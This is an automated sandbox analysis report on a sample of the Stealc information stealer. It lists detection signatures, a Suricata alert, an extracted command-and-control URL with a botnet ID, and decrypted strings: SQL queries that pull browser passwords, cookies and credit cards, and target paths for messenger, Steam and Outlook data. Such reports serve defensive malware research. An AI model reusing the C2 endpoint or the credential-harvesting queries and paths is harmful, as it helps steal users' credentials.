Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1546643
MD5:fbc1650a9c7f6f7c01aa9c1bd71cf2cb
SHA1:02a2bbc7edf8712575e11ca3a5b2fb38255b6851
SHA256:2222b91f09e31a309de68a2d7f66ef1ba8588d5fd0c92c6b15ca4d57622d509f
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1360 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FBC1650A9C7F6F7C01AA9C1BD71CF2CB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2018399242.0000000004C60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 1360JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 1360JoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.190000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T10:56:57.782133+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.190000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 0.2.file.exe.190000.0.unpackString decryptor: INSERT_KEY_HERE
                Source: 0.2.file.exe.190000.0.unpackString decryptor: 30
                Source: 0.2.file.exe.190000.0.unpackString decryptor: 11
                Source: 0.2.file.exe.190000.0.unpackString decryptor: 20
                Source: 0.2.file.exe.190000.0.unpackString decryptor: 24
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetProcAddress
                Source: 0.2.file.exe.190000.0.unpackString decryptor: LoadLibraryA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: lstrcatA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: OpenEventA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CreateEventA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CloseHandle
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Sleep
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetUserDefaultLangID
                Source: 0.2.file.exe.190000.0.unpackString decryptor: VirtualAllocExNuma
                Source: 0.2.file.exe.190000.0.unpackString decryptor: VirtualFree
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetSystemInfo
                Source: 0.2.file.exe.190000.0.unpackString decryptor: VirtualAlloc
                Source: 0.2.file.exe.190000.0.unpackString decryptor: HeapAlloc
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetComputerNameA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: lstrcpyA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetProcessHeap
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetCurrentProcess
                Source: 0.2.file.exe.190000.0.unpackString decryptor: lstrlenA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: ExitProcess
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GlobalMemoryStatusEx
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetSystemTime
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SystemTimeToFileTime
                Source: 0.2.file.exe.190000.0.unpackString decryptor: advapi32.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: gdi32.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: user32.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: crypt32.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: ntdll.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetUserNameA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CreateDCA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetDeviceCaps
                Source: 0.2.file.exe.190000.0.unpackString decryptor: ReleaseDC
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CryptStringToBinaryA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: sscanf
                Source: 0.2.file.exe.190000.0.unpackString decryptor: VMwareVMware
                Source: 0.2.file.exe.190000.0.unpackString decryptor: HAL9TH
                Source: 0.2.file.exe.190000.0.unpackString decryptor: JohnDoe
                Source: 0.2.file.exe.190000.0.unpackString decryptor: DISPLAY
                Source: 0.2.file.exe.190000.0.unpackString decryptor: %hu/%hu/%hu
                Source: 0.2.file.exe.190000.0.unpackString decryptor: http://185.215.113.206
                Source: 0.2.file.exe.190000.0.unpackString decryptor: bksvnsj
                Source: 0.2.file.exe.190000.0.unpackString decryptor: /6c4adf523b719729.php
                Source: 0.2.file.exe.190000.0.unpackString decryptor: /746f34465cf17784/
                Source: 0.2.file.exe.190000.0.unpackString decryptor: tale
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetEnvironmentVariableA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetFileAttributesA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GlobalLock
                Source: 0.2.file.exe.190000.0.unpackString decryptor: HeapFree
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetFileSize
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GlobalSize
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CreateToolhelp32Snapshot
                Source: 0.2.file.exe.190000.0.unpackString decryptor: IsWow64Process
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Process32Next
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetLocalTime
                Source: 0.2.file.exe.190000.0.unpackString decryptor: FreeLibrary
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetTimeZoneInformation
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetSystemPowerStatus
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetVolumeInformationA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetWindowsDirectoryA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Process32First
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetLocaleInfoA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetUserDefaultLocaleName
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetModuleFileNameA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: DeleteFileA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: FindNextFileA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: LocalFree
                Source: 0.2.file.exe.190000.0.unpackString decryptor: FindClose
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SetEnvironmentVariableA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: LocalAlloc
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetFileSizeEx
                Source: 0.2.file.exe.190000.0.unpackString decryptor: ReadFile
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SetFilePointer
                Source: 0.2.file.exe.190000.0.unpackString decryptor: WriteFile
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CreateFileA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: FindFirstFileA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CopyFileA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: VirtualProtect
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetLastError
                Source: 0.2.file.exe.190000.0.unpackString decryptor: lstrcpynA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: MultiByteToWideChar
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GlobalFree
                Source: 0.2.file.exe.190000.0.unpackString decryptor: WideCharToMultiByte
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GlobalAlloc
                Source: 0.2.file.exe.190000.0.unpackString decryptor: OpenProcess
                Source: 0.2.file.exe.190000.0.unpackString decryptor: TerminateProcess
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetCurrentProcessId
                Source: 0.2.file.exe.190000.0.unpackString decryptor: gdiplus.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: ole32.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: bcrypt.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: wininet.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: shlwapi.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: shell32.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: psapi.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: rstrtmgr.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CreateCompatibleBitmap
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SelectObject
                Source: 0.2.file.exe.190000.0.unpackString decryptor: BitBlt
                Source: 0.2.file.exe.190000.0.unpackString decryptor: DeleteObject
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CreateCompatibleDC
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GdipGetImageEncodersSize
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GdipGetImageEncoders
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GdiplusStartup
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GdiplusShutdown
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GdipSaveImageToStream
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GdipDisposeImage
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GdipFree
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetHGlobalFromStream
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CreateStreamOnHGlobal
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CoUninitialize
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CoInitialize
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CoCreateInstance
                Source: 0.2.file.exe.190000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                Source: 0.2.file.exe.190000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                Source: 0.2.file.exe.190000.0.unpackString decryptor: BCryptDecrypt
                Source: 0.2.file.exe.190000.0.unpackString decryptor: BCryptSetProperty
                Source: 0.2.file.exe.190000.0.unpackString decryptor: BCryptDestroyKey
                Source: 0.2.file.exe.190000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetWindowRect
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetDesktopWindow
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetDC
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CloseWindow
                Source: 0.2.file.exe.190000.0.unpackString decryptor: wsprintfA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: EnumDisplayDevicesA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetKeyboardLayoutList
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CharToOemW
                Source: 0.2.file.exe.190000.0.unpackString decryptor: wsprintfW
                Source: 0.2.file.exe.190000.0.unpackString decryptor: RegQueryValueExA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: RegEnumKeyExA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: RegOpenKeyExA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: RegCloseKey
                Source: 0.2.file.exe.190000.0.unpackString decryptor: RegEnumValueA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CryptBinaryToStringA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CryptUnprotectData
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SHGetFolderPathA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: ShellExecuteExA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: InternetOpenUrlA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: InternetConnectA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: InternetCloseHandle
                Source: 0.2.file.exe.190000.0.unpackString decryptor: InternetOpenA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: HttpSendRequestA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: HttpOpenRequestA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: InternetReadFile
                Source: 0.2.file.exe.190000.0.unpackString decryptor: InternetCrackUrlA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: StrCmpCA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: StrStrA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: StrCmpCW
                Source: 0.2.file.exe.190000.0.unpackString decryptor: PathMatchSpecA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: GetModuleFileNameExA
                Source: 0.2.file.exe.190000.0.unpackString decryptor: RmStartSession
                Source: 0.2.file.exe.190000.0.unpackString decryptor: RmRegisterResources
                Source: 0.2.file.exe.190000.0.unpackString decryptor: RmGetList
                Source: 0.2.file.exe.190000.0.unpackString decryptor: RmEndSession
                Source: 0.2.file.exe.190000.0.unpackString decryptor: sqlite3_open
                Source: 0.2.file.exe.190000.0.unpackString decryptor: sqlite3_prepare_v2
                Source: 0.2.file.exe.190000.0.unpackString decryptor: sqlite3_step
                Source: 0.2.file.exe.190000.0.unpackString decryptor: sqlite3_column_text
                Source: 0.2.file.exe.190000.0.unpackString decryptor: sqlite3_finalize
                Source: 0.2.file.exe.190000.0.unpackString decryptor: sqlite3_close
                Source: 0.2.file.exe.190000.0.unpackString decryptor: sqlite3_column_bytes
                Source: 0.2.file.exe.190000.0.unpackString decryptor: sqlite3_column_blob
                Source: 0.2.file.exe.190000.0.unpackString decryptor: encrypted_key
                Source: 0.2.file.exe.190000.0.unpackString decryptor: PATH
                Source: 0.2.file.exe.190000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: NSS_Init
                Source: 0.2.file.exe.190000.0.unpackString decryptor: NSS_Shutdown
                Source: 0.2.file.exe.190000.0.unpackString decryptor: PK11_GetInternalKeySlot
                Source: 0.2.file.exe.190000.0.unpackString decryptor: PK11_FreeSlot
                Source: 0.2.file.exe.190000.0.unpackString decryptor: PK11_Authenticate
                Source: 0.2.file.exe.190000.0.unpackString decryptor: PK11SDR_Decrypt
                Source: 0.2.file.exe.190000.0.unpackString decryptor: C:\ProgramData\
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                Source: 0.2.file.exe.190000.0.unpackString decryptor: browser:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: profile:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: url:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: login:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: password:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Opera
                Source: 0.2.file.exe.190000.0.unpackString decryptor: OperaGX
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Network
                Source: 0.2.file.exe.190000.0.unpackString decryptor: cookies
                Source: 0.2.file.exe.190000.0.unpackString decryptor: .txt
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                Source: 0.2.file.exe.190000.0.unpackString decryptor: TRUE
                Source: 0.2.file.exe.190000.0.unpackString decryptor: FALSE
                Source: 0.2.file.exe.190000.0.unpackString decryptor: autofill
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SELECT name, value FROM autofill
                Source: 0.2.file.exe.190000.0.unpackString decryptor: history
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                Source: 0.2.file.exe.190000.0.unpackString decryptor: cc
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                Source: 0.2.file.exe.190000.0.unpackString decryptor: name:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: month:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: year:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: card:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Cookies
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Login Data
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Web Data
                Source: 0.2.file.exe.190000.0.unpackString decryptor: History
                Source: 0.2.file.exe.190000.0.unpackString decryptor: logins.json
                Source: 0.2.file.exe.190000.0.unpackString decryptor: formSubmitURL
                Source: 0.2.file.exe.190000.0.unpackString decryptor: usernameField
                Source: 0.2.file.exe.190000.0.unpackString decryptor: encryptedUsername
                Source: 0.2.file.exe.190000.0.unpackString decryptor: encryptedPassword
                Source: 0.2.file.exe.190000.0.unpackString decryptor: guid
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                Source: 0.2.file.exe.190000.0.unpackString decryptor: cookies.sqlite
                Source: 0.2.file.exe.190000.0.unpackString decryptor: formhistory.sqlite
                Source: 0.2.file.exe.190000.0.unpackString decryptor: places.sqlite
                Source: 0.2.file.exe.190000.0.unpackString decryptor: plugins
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Local Extension Settings
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Sync Extension Settings
                Source: 0.2.file.exe.190000.0.unpackString decryptor: IndexedDB
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Opera Stable
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Opera GX Stable
                Source: 0.2.file.exe.190000.0.unpackString decryptor: CURRENT
                Source: 0.2.file.exe.190000.0.unpackString decryptor: chrome-extension_
                Source: 0.2.file.exe.190000.0.unpackString decryptor: _0.indexeddb.leveldb
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Local State
                Source: 0.2.file.exe.190000.0.unpackString decryptor: profiles.ini
                Source: 0.2.file.exe.190000.0.unpackString decryptor: chrome
                Source: 0.2.file.exe.190000.0.unpackString decryptor: opera
                Source: 0.2.file.exe.190000.0.unpackString decryptor: firefox
                Source: 0.2.file.exe.190000.0.unpackString decryptor: wallets
                Source: 0.2.file.exe.190000.0.unpackString decryptor: %08lX%04lX%lu
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 0.2.file.exe.190000.0.unpackString decryptor: ProductName
                Source: 0.2.file.exe.190000.0.unpackString decryptor: x32
                Source: 0.2.file.exe.190000.0.unpackString decryptor: x64
                Source: 0.2.file.exe.190000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                Source: 0.2.file.exe.190000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: 0.2.file.exe.190000.0.unpackString decryptor: ProcessorNameString
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: 0.2.file.exe.190000.0.unpackString decryptor: DisplayName
                Source: 0.2.file.exe.190000.0.unpackString decryptor: DisplayVersion
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Network Info:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - IP: IP?
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - Country: ISO?
                Source: 0.2.file.exe.190000.0.unpackString decryptor: System Summary:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - HWID:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - OS:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - Architecture:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - UserName:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - Computer Name:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - Local Time:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - UTC:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - Language:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - Keyboards:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - Laptop:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - Running Path:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - CPU:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - Threads:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - Cores:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - RAM:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - Display Resolution:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: - GPU:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: User Agents:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Installed Apps:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: All Users:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Current User:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Process List:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: system_info.txt
                Source: 0.2.file.exe.190000.0.unpackString decryptor: freebl3.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: mozglue.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: msvcp140.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: nss3.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: softokn3.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: vcruntime140.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: \Temp\
                Source: 0.2.file.exe.190000.0.unpackString decryptor: .exe
                Source: 0.2.file.exe.190000.0.unpackString decryptor: runas
                Source: 0.2.file.exe.190000.0.unpackString decryptor: open
                Source: 0.2.file.exe.190000.0.unpackString decryptor: /c start
                Source: 0.2.file.exe.190000.0.unpackString decryptor: %DESKTOP%
                Source: 0.2.file.exe.190000.0.unpackString decryptor: %APPDATA%
                Source: 0.2.file.exe.190000.0.unpackString decryptor: %LOCALAPPDATA%
                Source: 0.2.file.exe.190000.0.unpackString decryptor: %USERPROFILE%
                Source: 0.2.file.exe.190000.0.unpackString decryptor: %DOCUMENTS%
                Source: 0.2.file.exe.190000.0.unpackString decryptor: %PROGRAMFILES%
                Source: 0.2.file.exe.190000.0.unpackString decryptor: %PROGRAMFILES_86%
                Source: 0.2.file.exe.190000.0.unpackString decryptor: %RECENT%
                Source: 0.2.file.exe.190000.0.unpackString decryptor: *.lnk
                Source: 0.2.file.exe.190000.0.unpackString decryptor: files
                Source: 0.2.file.exe.190000.0.unpackString decryptor: \discord\
                Source: 0.2.file.exe.190000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                Source: 0.2.file.exe.190000.0.unpackString decryptor: \Local Storage\leveldb
                Source: 0.2.file.exe.190000.0.unpackString decryptor: \Telegram Desktop\
                Source: 0.2.file.exe.190000.0.unpackString decryptor: key_datas
                Source: 0.2.file.exe.190000.0.unpackString decryptor: D877F783D5D3EF8C*
                Source: 0.2.file.exe.190000.0.unpackString decryptor: map*
                Source: 0.2.file.exe.190000.0.unpackString decryptor: A7FDF864FBC10B77*
                Source: 0.2.file.exe.190000.0.unpackString decryptor: A92DAA6EA6F891F2*
                Source: 0.2.file.exe.190000.0.unpackString decryptor: F8806DD0C461824F*
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Telegram
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Tox
                Source: 0.2.file.exe.190000.0.unpackString decryptor: *.tox
                Source: 0.2.file.exe.190000.0.unpackString decryptor: *.ini
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Password
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.190000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.190000.0.unpackString decryptor: 00000001
                Source: 0.2.file.exe.190000.0.unpackString decryptor: 00000002
                Source: 0.2.file.exe.190000.0.unpackString decryptor: 00000003
                Source: 0.2.file.exe.190000.0.unpackString decryptor: 00000004
                Source: 0.2.file.exe.190000.0.unpackString decryptor: \Outlook\accounts.txt
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Pidgin
                Source: 0.2.file.exe.190000.0.unpackString decryptor: \.purple\
                Source: 0.2.file.exe.190000.0.unpackString decryptor: accounts.xml
                Source: 0.2.file.exe.190000.0.unpackString decryptor: dQw4w9WgXcQ
                Source: 0.2.file.exe.190000.0.unpackString decryptor: token:
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Software\Valve\Steam
                Source: 0.2.file.exe.190000.0.unpackString decryptor: SteamPath
                Source: 0.2.file.exe.190000.0.unpackString decryptor: \config\
                Source: 0.2.file.exe.190000.0.unpackString decryptor: ssfn*
                Source: 0.2.file.exe.190000.0.unpackString decryptor: config.vdf
                Source: 0.2.file.exe.190000.0.unpackString decryptor: DialogConfig.vdf
                Source: 0.2.file.exe.190000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 0.2.file.exe.190000.0.unpackString decryptor: libraryfolders.vdf
                Source: 0.2.file.exe.190000.0.unpackString decryptor: loginusers.vdf
                Source: 0.2.file.exe.190000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.190000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: browsers
